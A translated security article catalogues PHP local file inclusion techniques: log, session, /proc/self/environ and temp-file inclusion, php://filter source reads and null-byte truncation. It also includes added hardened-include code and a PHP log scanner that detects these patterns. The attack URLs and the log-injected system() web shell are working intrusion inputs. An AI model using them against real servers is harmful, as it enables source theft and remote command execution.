Summary of LFI Vulnerability Exploitation


By ettack

Main functions involved
include(), require(), include_once(), require_once()
Also relevant: readfile(), file() and file_get_contents() (these read a file rather than execute it), and the php.ini settings allow_url_include, upload_tmp_dir, post_max_size and max_input_time, among others.
 
 
Typical vulnerable code:
<?php include($_GET['pages'] . '.php'); ?>
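The following is an added example, not code from the original article: the vulnerable include above beside two hardened replacements, one that maps a request key to a fixed allowlist and one that confines a validated name to a single directory. The file names, the "pages/" directory and the helper names are assumptions for illustration; it assumes PHP 7.1 or later.

```php
<?php
// Added example (not from the original article): the article's vulnerable
// include beside two hardened replacements. File names, the "pages/"
// directory and the helper names are assumptions for illustration.
// Requires PHP 7.1+ (nullable return types).

// VULNERABLE, as in the article: the request value becomes the include path,
// so traversal (../../etc/passwd%00), wrappers (php://filter/...) and
// poisoned log files all reach include().
//   include($_GET['pages'] . '.php');

// HARDENED 1: allowlist. The request selects a key, never a path, so no
// user-controlled bytes are ever part of the file name.
function resolve_page_allowlist(string $requested): ?string
{
    static $pages = [
        'home'    => 'pages/home.php',
        'about'   => 'pages/about.php',
        'contact' => 'pages/contact.php',
    ];
    return $pages[$requested] ?? null;   // unknown key -> null, caller sends 404
}

// HARDENED 2, defense in depth when the set of pages is not fixed: accept a
// plain identifier only and confine the canonical path to one directory.
function resolve_page_confined(string $requested, string $baseDir): ?string
{
    // No '/', '\', '.', ':' or control bytes, so "../", "php://", "data:"
    // and a decoded %00 are rejected before the file system is touched.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested . '.php');
    // realpath() is false for missing files; the canonical path must also
    // stay below the canonical base directory (symlinks are resolved first).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage: resolve first, include only what resolution returned.
$requested = (string) ($_GET['pages'] ?? 'home');
$file = resolve_page_allowlist($requested);   // or resolve_page_confined($requested, __DIR__ . '/pages')
if ($file === null) {
    http_response_code(404);
    exit('page not found');
}
include $file;
```

The allowlist form is preferable because the request never contributes bytes to the file name, which also removes the remote-URL and wrapper cases (items 8 and 11 below) without relying on allow_url_include. The confined form rejects the null byte and path separators before realpath() is called, so the truncation tricks in the last section have nothing to work with.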
 
Black-box identification:
A file inclusion vulnerability may exist when the URL carries parameters with names such as path, dir, file, pag, page, archive, p, eng or language and their values look like file names.
Exploitation of local inclusion vulnerabilities (truncation is covered separately below)
 
1. The ideal case is including a jpg, txt, rar or other file that has already been uploaded to the same server.
2. Including system logs, such as the Apache logs and file-system logs. When Apache uses the "combined" log format the logs are usually large and often cannot be included successfully. Automated attack tools exist that target log inclusion.
The ghost blog mentioned a problem with spaces; see "Evil Space: A New Breakthrough in PHP Local File Inclusion Vulnerabilities" for a way around it. In practice the one-line script can simply be base64-encoded before it is written into the log.
3. Environment variables: include /proc/self/environ, which exposes the web session information and request parameters such as the User-Agent, and the User-Agent is controlled by the client. Reference: "Shell via LFI - proc/self/environ method", http://hi.baidu.com/root_exp/blog/item/9c0571fc2d1_64fd7887d7d.html
4. Including files generated by the PHP application itself: caches, compiled templates and similar. This has a high success rate against open-source applications.
5. Using local inclusion to read sensitive PHP source files requires PHP 5 or later. For example, the source of config is read with:
index.php?pages=php://filter/read=convert.base64-encode/resource=config
In the special case where the application uses readfile() rather than include(), nothing is executed and the source code can be read directly.
6. Use a phpinfo page to get a shell. The chance of finding a phpinfo page somewhere in the web estate of a large organization is quite high.
PoC and introduction: see the article on exploiting LFI with the help of phpinfo output, http://www.bkjia.com/Article/201202/119213.html
7. Use a PHP file that contains an error or an uninitialized variable; as long as a variable is not initialized it may be exploitable. For details see the article "include() local file inclusion vulnerability", http://www.bkjia.com/Article/200809/29748.html
8. Use index.php?pages=http://www.2cto.com/path/xss.php?xss=phpcode (domain restrictions need to be taken into account).
9. Including temporary upload files. This method is very troublesome; reference: "POST method uploads", http://www.php.net/manual/en/features.file-upload.post-method.php
The answer to the temporary file being deleted is a slow connection. (Note: the premise is file_uploads = On in php.ini; max_file_uploads was added in 5.3.1 and by default allows up to 20 files per request.)
Windows format: up to four random characters from 'A'-'Z', 'a'-'z', '0'-'9', for example c:/windows/temp/php3e.tmp
Linux format: six random characters from 'A'-'Z', 'a'-'z', '0'-'9', for example /tmp/phpUs7MxA
For two kinds of upload code for the slow-connection approach, see "PHP security: LFI vulnerability GetShell method parade", www.2cto.com/article/201511/94414.html
 
10. When no writable directory can be found, inject a directory-changing script into the log and use it to look for a writable directory, for example by writing the following into the log:
<?php $s = $_GET; @chdir($s['x']); echo @system($s['y']); ?>
Linux: index.php?pages=/var/log/apache/logs/error_log%00&x=/&y=uname
Windows: index.php?pages=..\apache\logs\error.log%00&x=.&y=dir
For more information see "PHP local file inclusion (LFI) vulnerability exploitation", http://www.bkjia.com/Article/201202/119214.html
11. Use PHP wrappers such as php://input, php://filter and data:// to include files; this works from PHP 5.2.0 with allow_url_include. Reference: http://blog.php-security.org/archives/45-PHP-5.2.0- The allow_url_fopen and allow_url_include settings discussed in that article only protect against stream handles that are marked as URL handles; this covers http(s) and ftp(s) but not wrapper schemes such as php:// or data://.
12. Using LFI to check whether a directory exists, and to list a directory, for example:
** index.php?pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00
** This check is fully reliable on a TTY shell, but via the URL it sometimes is not: the passwd content can be displayed even when dossierexistant does not exist.
** FreeBSD "directory listing with PHP file functions", http://websec.wordpress.com/2009... Php-file-functions/ (directory listing)
** If the application returns header.php + "File not found" + footer.php when the directory does not exist, that logic fits programmers' habits. I once found a directory with deep log files this way and got a shell.
13. Including the SESSION file. PHP saves sessions as sess_SESSIONID; the default locations (PHP Sessions) are /tmp/, /var/lib/php/session/, /var/lib/php5/ and c:/windows/temp/.
14. Locate log files by including /proc/self/cmdline or /proc/self/fd/<fd number> (these are owned by root, so root is required by default).
See "Local File Inclusion - Tricks of the Trade", http://labs.neohapsis.com/2008/0... Ricks-of-the-trade/, which also mentions including /var/log/auth.log, although that file is 644 by default.
15. Including the mail log, usual location /var/log/maillog. This method is also very good; see "local file inclusion tricks", http://devels-playground.blogspo... Clusion-tricks.html
16. Including a fixed remote file without any integrity check is very weak and can be exploited; a man-in-the-middle attack, for example, can replace the file.
<?php include("http://172.0.0.1/code.php"); ?>
 
 
Truncation
(A brief introduction only; many articles found via Google cover it.)
Two things decide whether truncation works: magic_quotes_gpc and the PHP version.

1. %00 null-character truncation, which applies to PHP 5.3.4 and earlier. Apart from that case, the following truncations are conditional:
2. Path-length truncation
Linux: file names longer than 4096 characters are truncated.
Windows: file names longer than 256 characters are truncated.
Many references are not listed in detail. This article is intended to help you with LFI.
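From the detection side, the indicators that items 1 through 16 and the truncation section rely on (traversal with %00, php:// and data: wrappers, /proc/self/*, log, session and temp-file paths, PHP tags smuggled through the User-Agent, over-long paths) can all be matched against the web server's access log. The following PHP script is an added example, not part of the original article: the log lines are constructed, the pattern names are my own, and the 1024-byte length threshold is an assumption.

```php
<?php
// Added example (not part of the original article): scan Apache "combined"
// access-log lines for the LFI indicators the article lists. Sample lines
// are constructed; the length threshold is an assumption.

const LFI_PATTERNS = [
    'null_byte_truncation' => '/%00|\x00/i',
    'path_traversal'       => '#(\.\./|\.\.\\\\|%2e%2e%2f|%2e%2e/|\.\.%2f)#i',
    'php_wrapper'          => '#(php|data|expect|phar)://#i',
    'php_filter_read'      => '#php://filter/#i',
    'proc_self'            => '#/proc/self/(environ|cmdline|fd/\d+)#i',
    'log_file'             => '#/var/log/|/apache/logs/|error[._]log|access[._]log|maillog|auth\.log#i',
    'session_file'         => '#sess_[a-z0-9]+#i',
    'temp_upload'          => '#/tmp/php[a-z0-9]{6}|[\\\\/]temp[\\\\/]php[a-z0-9]{2,4}\.tmp#i',
    'php_tag'              => '#<\?php|<\?=#i',
];
const MAX_REASONABLE_URL = 1024;   // assumption: longer targets suggest length truncation

// Parse one combined-format line into the fields we need; null on mismatch.
function parse_combined(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'target' => $m[4],
            'status' => (int) $m[5], 'referer' => $m[6], 'ua' => $m[7]];
}

// Decode twice so double-encoded forms (%2500 -> %00 -> NUL) still surface.
function normalize(string $s): string
{
    return rawurldecode(rawurldecode($s));
}

// Return the indicator names (with the field they fired on) for one line.
function classify_line(string $line): array
{
    $req = parse_combined($line);
    if ($req === null) {
        return ['unparseable'];
    }
    $hits = [];
    // Check both the raw and the decoded target: some patterns only appear
    // encoded, others only after decoding.
    $fields = [
        'target'  => $req['target'] . "\n" . normalize($req['target']),
        'ua'      => $req['ua'],
        'referer' => $req['referer'],
    ];
    foreach (LFI_PATTERNS as $name => $re) {
        foreach ($fields as $field => $value) {
            if (preg_match($re, $value)) {
                $hits[] = "$name($field)";
                break;
            }
        }
    }
    if (strlen($req['target']) > MAX_REASONABLE_URL) {
        $hits[] = 'overlong_path(target)';
    }
    return $hits;
}

// Constructed sample lines (not real traffic).
$sample = [
    '10.0.0.5 - - [10/Feb/2012:10:00:01 +0000] "GET /index.php?pages=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Feb/2012:10:00:02 +0000] "GET /index.php?pages=../../../../etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Feb/2012:10:00:03 +0000] "GET /index.php?pages=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 2201 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [10/Feb/2012:10:00:04 +0000] "GET /index.php?pages=/proc/self/environ HTTP/1.1" 200 77 "-" "<?php echo 1; ?>"',
];

foreach ($sample as $line) {
    $hits = classify_line($line);
    printf("%-6s %s\n", $hits ? 'ALERT' : 'ok', $hits ? implode(', ', $hits) : substr($line, 0, 60));
}
```

Run it with the PHP CLI; the first sample line is reported as ok, the second fires the null-byte and traversal patterns, the third the wrapper and php://filter patterns, and the fourth both the /proc/self indicator on the target and the PHP-tag indicator on the User-Agent, which is the combination that item 3 above describes. The User-Agent and Referer are scanned separately from the request target precisely because log poisoning arrives through those headers rather than the URL.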
 
